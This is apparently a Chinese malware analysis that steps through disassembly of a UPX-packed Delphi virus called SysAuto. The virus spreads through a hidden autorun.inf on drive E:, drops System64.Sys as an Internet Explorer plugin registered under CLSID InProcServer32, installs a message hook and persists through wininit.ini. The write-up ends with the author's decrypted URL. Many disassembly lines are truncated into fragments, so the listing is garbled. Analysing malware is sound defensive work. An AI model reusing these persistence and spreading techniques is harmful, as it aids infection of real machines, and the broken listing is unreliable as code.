首先用PEID查看是用UPX加殼,脫掉後顯示爲Delphi。
從文件最後讀出文件大小(已加密),XOR解密後得到真正的文件大小。
下面是簡單的分析過程:
將病毒文件及啓動文件autorun.inf複製到E盤,然後設置文件隱藏屬性
0040484D |. 8BEC mov ebp,esp
00404851 |.
00404853 |.
00404855 |. 55 push ebp
00404856 |. 68 02494000 push SysAuto1.00404902
0040485B |. 64:FF30 push dword ptr fs:[eax]
0040485E |. 64:8920 mov dword ptr fs:[eax],esp
00404861 |. 8D55 FC lea edx,dword ptr ss:[ebp-4]
00404864 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
00404869 |. E8 86FEFFFF call SysAuto
0040486E |. 68 80000000 push 80 ; /FileAttributes = NORMAL
00404873 |. 68
00404878 |. E8 BFFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
0040487D |. 68
00404882 |. E8 25FBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
00404887 |.
00404889 |. 68
0040488E |. 8D
00404891 |.
00404893 |. E
00404898 |. 8B
0040489B |. E8 E4EEFFFF call SysAuto1.00403784
004048AB |. B8 98494000 mov eax,SysAuto1.00404998 ; ASCII "E:/AutoRun.Inf"
004048B0 |. E8 EB030000 call SysAuto1.00404CA0
004048B5 |.
004048B7 |. 68
004048BC |. E8 7BFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
004048CB |. E8 5CFFFFFF call SysAuto
004048D0 |.
004048D5 |. E8 82FBFFFF call <jmp.&KERNEL32.Sleep> ; /Sleep
004048DA |. 8B55 FC mov edx,dword ptr ss:[ebp-4]
004048DD |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048E2 |. E8 45FFFFFF call SysAuto
004048E7 |.
004048E9 |.
004048EA |. 59 pop ecx
004048EB |. 59 pop ecx
004048EC |. 64:8910 mov dword ptr fs:[eax],edx
004048EF |. 68 09494000 push SysAuto1.00404909
004048FC |. E8 27ECFFFF call SysAuto1.00403528
00404901 /. C3 retn
創建autorun.inf文件
00404CA0 /$ 53 push ebx
00404CA1 |. 56 push esi
00404CA2 |. 57 push edi
00404CA3 |. 51 push ecx
00404CA4 |. 8BF2 mov esi,edx
00404CA6 |. 8BD8 mov ebx,eax
00404CA8 |. 33FF xor edi,edi
00404CAA |.
00404CAC |.
00404CAE |.
00404CB0 |.
00404CB2 |.
00404CB4 |. 68
00404CB9 |. 8BC3 mov eax,ebx
00404CBB |. E
00404CC0 |. 50 push eax ; |FileName
00404CC1 |. E8 DEF6FFFF call <jmp.&KERNEL32.CreateFileA> ; /CreateFileA
00404CC6 |. 8BD8 mov ebx,eax
00404CC8 |. 83FB FF cmp ebx,-1
00404CCB |. 74
00404CCD |.
00404CCF |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404CD3 |. 50 push eax
00404CD4 |. 8BC6 mov eax,esi
00404CD6 |. E8 45E9FFFF call SysAuto1.00403620
00404CDB |. 50 push eax
00404CDC |. 8BC6 mov eax,esi
00404CDE |. E
00404CE3 |. 50 push eax ; |Buffer
00404CE4 |. 53 push ebx ; |hFile
00404CE5 |. E8 7AF7FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
00404CEA |. 53 push ebx ; /hFile
00404CEB |. E8
00404CF0 |. 53 push ebx ; /hObject
00404CF1 |. E8 9EF6FFFF call <jmp.&KERNEL32.CloseHandle> ; /CloseHandle
00404CF6 |. 83CF FF or edi,FFFFFFFF
00404CF9 |> 8BC7 mov eax,edi
00404CFB |.
00404CFC |.
00404CFD |. 5E pop esi
00404CFE |. 5B pop ebx
00404CFF /. C3 retn
向C:/Program Files/Internet Explorer/PLUGINS/複製文件System64.Sys
00405719 |. A
0040571E |. 8B00 mov eax,dword ptr ds:[eax]
00405720 |. E8 5FE0FFFF call SysAuto1.00403784
00405725 |. 50 push eax
00405726 |. 8D55 D4 lea edx,dword ptr ss:[ebp
00405729 |. A
0040572E |. E8
00405733 |. 8B45 D4 mov eax,dword ptr ss:[ebp
00405736 |. E8 49E0FFFF call SysAuto1.00403784
0040573B |. 50 push eax ; |String1
00405741 |.
00405743 |. 74 5D je short SysAuto
00405745 |. 8B0D C8604000 mov ecx,dword ptr ds:[
0040574B |. 8B09 mov ecx,dword ptr ds:[ecx]
0040574D |. A
00405752 |. 8B
00405758 |. E8 0FDFFFFF call SysAuto
0040575D |. A
00405762 |. 8B00 mov eax,dword ptr ds:[eax]
00405764 |. E8 1BE0FFFF call SysAuto1.00403784
00405769 |. 50 push eax ; /FileName
00405771 |. A
00405776 |. 8B00 mov eax,dword ptr ds:[eax]
00405778 |. E8 07E0FFFF call SysAuto1.00403784
0040577D |. 50 push eax
0040577E |. A
00405783 |. E8 FCDFFFFF call SysAuto1.00403784
00405788 |. 50 push eax ; |ExistingFileName
00405789 |. E8 0EECFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
0040578E |.
00405790 |. A
00405795 |. 8B00 mov eax,dword ptr ds:[eax]
00405797 |. E8 E8DFFFFF call SysAuto1.00403784
0040579D |. E8 9AECFFFF call <jmp.&KERNEL32.SetFileAttributes>; /SetFileAttributesA
004057B2 |. E8 B5DEFFFF call SysAuto
004057B7 |. B
004057BC |. B9
004057CC |. A
004057D1 |. E8 AEDFFFFF call SysAuto1.00403784
004057D6 |. 8BD8 mov ebx,eax
004057D8 |. 53 push ebx ; /FileName = "C:/Program Files/Internet Explorer/PLUGINS/System64.Sys"
004057D9 |. E8 CEEBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
004057DE |. 53 push ebx ; /Path
004057DF |. E8 44EEFFFF call <jmp.&shlwapi.PathFileExistsA> ; /PathFileExistsA
判斷文件是否存在,如果不存在,從資源中取出
004057E4 |.
004057E6 |. 74 33 je short SysAuto1.0040581B
004057E8 |. A1 CC764000 mov eax,dword ptr ds:[4076CC]
004057ED |. 50 push eax
004057EE |. A
004057FA |. BA
004057FF |. B8
00405804 |. E8
00405809 |. 8B
00405814 |. E8
00405819 |. EB 17 jmp short SysAuto1.00405832
0040581B |> A1 CC764000 mov eax,dword ptr ds:[4076CC]
00405820 |. 50 push eax ; /Arg1 => 009B02B4
00405821 |. 8BCB mov ecx,ebx ; |
00405823 |. BA
00405828 |. B8
0040582D |. E8 0EF2FFFF call SysAuto
00405832 |> BA A4594000 mov edx,SysAuto
00405837 |.
00405839 |. E
0040583E |.
00405840 |.
00405846 |. BA B4594000 mov edx,SysAuto1.004059B4 ; ASCII "xxkxxxxjtrj8jok"
0040584B |.
0040584D |. E8 AEF1FFFF call SysAuto
00405852 |.
00405854 |.
0040585E |.
00405860 |.
00405862 |.
00405864 |.
00405866 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
0040586B |. 50 push eax ; |Arg2 => 00400000 ASCII "MZP"
0040586E |. BA A4594000 mov edx,SysAuto
00405873 |. B
00405878 |.
00405880 |. E8 87EBFFFF call <jmp.&KERNEL32.LoadLibraryA> ; /LoadLibraryA
00405885 |. 8BD8 mov ebx,eax
00405887 |. 85DB test ebx,ebx
00405889 |. 74
0040588B |. 68 CC594000 push SysAuto1.004059CC ; /ProcNameOrOrdinal = "MsgHookOff"
00405890 |. 53 push ebx ; |hModule
00405891 |. E8 4EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
00405896 |. A3 D0764000 mov dword ptr ds:[4076D0],eax
0040589B |. 68 D8594000 push SysAuto1.004059D8 ; /ProcNameOrOrdinal = "MsgHookOn"
004058AB |. 833D D0764000>cmp dword ptr ds:[4076D0],0
004058B2 |. 74 41 je short SysAuto
004058B4 |. 833D D4764000>cmp dword ptr ds:[4076D4],0
004058BB |. 74 38 je short SysAuto
004058BD |. FF15 D4764000 call dword ptr ds:[4076D4]
004058CB |>
004058CD |.
004058CF |.
004058D1 |. 56 |push esi ; |pMsg
004058D2 |. E8 D5EBFFFF |call <jmp.&user32.GetMessageA> ; /GetMessageA
004058D7 |.
004058D9 |.^ 75 EA /jnz short SysAuto
004058DB |. FF15 D0764000 call dword ptr ds:[4076D0]
004058E1 |.
004058E3 |. E8 9CEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
004058E8 |. 53 push ebx ; /hLibModule
004058E9 |. E8 CEEAFFFF call <jmp.&KERNEL32.FreeLibrary> ; /FreeLibrary
004058EE |.
004058FA |. B9 E8594000 mov ecx,SysAuto1.004059E8 ; |ASCII "{754FB7D8-B8FE-4810-B363-A788CD
004058FF |. BA
00405904 |. B8 02000080 mov eax,80000002 ; |
00405909 |. E
0040590E |. A
00405913 |. E8 6CDEFFFF call SysAuto1.00403784
00405918 |. 50 push eax ; /Arg1
00405919 |. E8
0040591E |>
00405920 |.
00405921 |. 59 pop ecx
00405922 |. 59 pop ecx
00405923 |. 64:8910 mov dword ptr fs:[eax],edx
00405926 |. 68 40594000 push SysAuto1.00405940
0040592B |> 8D45 D4 lea eax,dword ptr ss:[ebp
0040592E |. BA 07000000 mov edx,7
00405933 |. E
00405938 /. C3 retn
從資源中取出system64.sys
00404AA0 |. 68
00404AA5 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404AA8 |. 50 push eax ; |FileName
00404AA9 |. E
00404AAE |. 8BD8 mov ebx,eax
00404AB0 |. 83FB FF cmp ebx,-1
00404AB3 |. 74 58 je short SysAuto1.00404B0D
00404AB5 |. 57 push edi ; /hResource
00404AB6 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404ABB |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404ABC |. E8
00404ACA |. 8B
00404ACD |. 50 push eax ; |Buffer
00404ACE |. 53 push ebx ; |hFile
00404ACF |. E8
00404AD4 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AD7 |. E8 44EBFFFF call SysAuto1.00403620
00404ADC |. 8BF8 mov edi,eax
00404ADE |.
00404AE0 |. 8D
00404AE3 |. 50 push eax
00404AE4 |. 57 push edi
00404AE5 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AE8 |. E8 97ECFFFF call SysAuto1.00403784
00404AED |. 50 push eax ; |Buffer
00404AEE |. 53 push ebx ; |hFile
00404AEF |. E8
00404AF4 |. 53 push ebx ; /hFile
00404AF5 |. E8 3AF9FFFF call <jmp.&KERNEL32.SetEndOfFil>; /SetEndOfFile
00404AFA |. 53 push ebx ; /hObject
00404AFB |. E8
00404B00 |. 8BC6 mov eax,esi
00404B02 |. E8 B
00404B07 |. 56 push esi ; /hResource
00404B08 |. E8 B
00404B0D |>
00404B0E |. 5E pop esi
00404B
00404B10 |. 8BE5 mov esp,ebp
00404B12 |. 5D pop ebp
00404B13 /. C2 0400 retn 4
修改註冊表進行文件啓動
00404D00 /$ 55 push ebp
00404D01 |. 8BEC mov ebp,esp
00404D03 |.
00404D06 |. 53 push ebx
00404D07 |. 56 push esi
00404D08 |. 8BF1 mov esi,ecx
00404D
00404D0D |.
00404D
00404D12 |. C
00404D19 |. 8D4D F8 lea ecx,dword ptr ss:[ebp-8]
00404D
00404D1D |. 8D4D FC lea ecx,dword ptr ss:[ebp-4] ; |
00404D20 |. 51 push ecx ; |pHandle
00404D21 |.
00404D23 |. 68
00404D28 |.
00404D
00404D
00404D2E |. 52 push edx ; |Subkey
00404D
00404D30 |. E8 4FF6FFFF call <jmp.&advapi32.RegCreateKe>; /RegCreateKeyExA
00404D35 |. 53 push ebx ; /String = ""
00404D36 |. E8
00404D3B |. 40 inc eax
00404D
00404D3D |. 53 push ebx ; |Buffer
00404D3E |.
00404D40 |.
00404D42 |. 56 push esi ; |ValueName
00404D43 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404D46 |. 50 push eax ; |hKey
00404D47 |. E8
00404D
00404D
00404D50 |. E8
00404D55 |. 5E pop esi
00404D56 |. 5B pop ebx
00404D57 |. 59 pop ecx
00404D58 |. 59 pop ecx
00404D59 |. 5D pop ebp
00404D
00404D5D 8D40 00 lea eax,dword ptr ds:[eax]
00404D60 /$ 55 push ebp
00404D61 |. 8BEC mov ebp,esp
00404D63 |. 53 push ebx
00404D64 |. BB 84764000 mov ebx,SysAuto1.00407684
00404D69 |. 8BC3 mov eax,ebx
00404D6B |. BA E44D4000 mov edx,SysAuto1.00404DE4 ; ASCII "CLSID/{754FB7D8-B8FE-4810-B363-A788CD
00404D70 |. E8 E3E7FFFF call SysAuto1.00403558
00404D75 |. 68 144E4000 push SysAuto1.00404E14
00404D
00404D
00404D81 |. 8BD0 mov edx,eax ; |
00404D83 |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404D88 |. B8 00000080 mov eax,80000000 ; |
00404D8D |. E8 6EFFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404D92 |. 8BC3 mov eax,ebx
00404D94 |. BA 204E4000 mov edx,SysAuto1.00404E20 ; ASCII "/InProcServer32"
00404D99 |. E8 8AE8FFFF call SysAuto1.00403628
00404D9E |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404DA1 |. 50 push eax
00404DA2 |. 8B03 mov eax,dword ptr ds:[ebx]
00404DA4 |. E8 DBE9FFFF call SysAuto1.00403784
00404DA9 |. 8BD0 mov edx,eax ; |
00404DAB |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404DB0 |. B8 00000080 mov eax,80000000 ; |
00404DB5 |. E8 46FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DBA |. 68 304E4000 push SysAuto1.00404E30 ; ASCII "Apartment"
00404DBF |. 8B03 mov eax,dword ptr ds:[ebx]
00404DC1 |. E8 BEE9FFFF call SysAuto1.00403784
00404DC6 |. 8BD0 mov edx,eax ; |
00404DC8 |. B9
00404DCD |. B8 00000080 mov eax,80000000 ; |
00404DD2 |. E8 29FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DD7 |. 5B pop ebx
00404DD8 |. 5D pop ebp
00404DD9 /. C2 0400 retn 4
根據操作系統版本修改wininit.ini的內容
00404E
00404E52 |. C70424 940000>mov dword ptr ss:[esp],94
00404E59 |. 54 push esp ; /pVersionInformation
00404E
00404E
00404E64 |.
00404E67 |.
00404E6D /. C3 retn
00404E6E 8BC0 mov eax,eax
00404E70 /$ 53 push ebx
00404E71 |. 56 push esi
00404E72 |.
00404E78 |. 8BF2 mov esi,edx
00404E
00404E
00404E81 |.
00404E83 |. 74
00404E85 |. 68 04010000 push 104
00404E
00404E91 |. 50 push eax
00404E92 |. 8BC6 mov eax,esi
00404E94 |. E8 EBE8FFFF call SysAuto1.00403784
00404E99 |. 50 push eax ; |LongPath
00404E
00404E
00404EA4 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404EA8 |. 50 push eax
00404EA9 |. 8BC3 mov eax,ebx
00404EAB |. E8 D4E8FFFF call SysAuto1.00403784
00404EB0 |. 50 push eax ; |LongPath
00404EB1 |. E8
00404EB6 |.
00404EBB |. 8D8424 090100>lea eax,dword ptr ss:[esp+109] ; |
00404EC2 |. 50 push eax ; |String
00404EC3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; |
00404EC7 |. 50 push eax ; |Key
00404EC8 |. 68
00404ECD |. E8 9AF5FFFF call <jmp.&KERNEL32.WritePrivat>; /WritePrivateProfileStringA
00404ED2 |. EB 17 jmp short SysAuto1.00404EEB
00404ED4 |>
00404ED6 |. 8BC3 mov eax,ebx
00404ED8 |. E
00404EDD |. 50 push eax
00404EDE |. 8BC6 mov eax,esi
00404EE0 |. E8 9FE8FFFF call SysAuto1.00403784
00404EE5 |. 50 push eax ; |ExistingName
00404EE6 |. E8
00404EEB |>
00404EF1 |. 5E pop esi
00404EF2 |. 5B pop ebx
00404EF3 /. C3 retn
中間還有一段是解密作者隱藏的數據,下面是解密出的數據
解密出病毒作者的網址及其他數據
009B
009B
009B
009B
009B
009B
009B
009B
009B00AF 65 74
www.plince.net/XX/nn.asp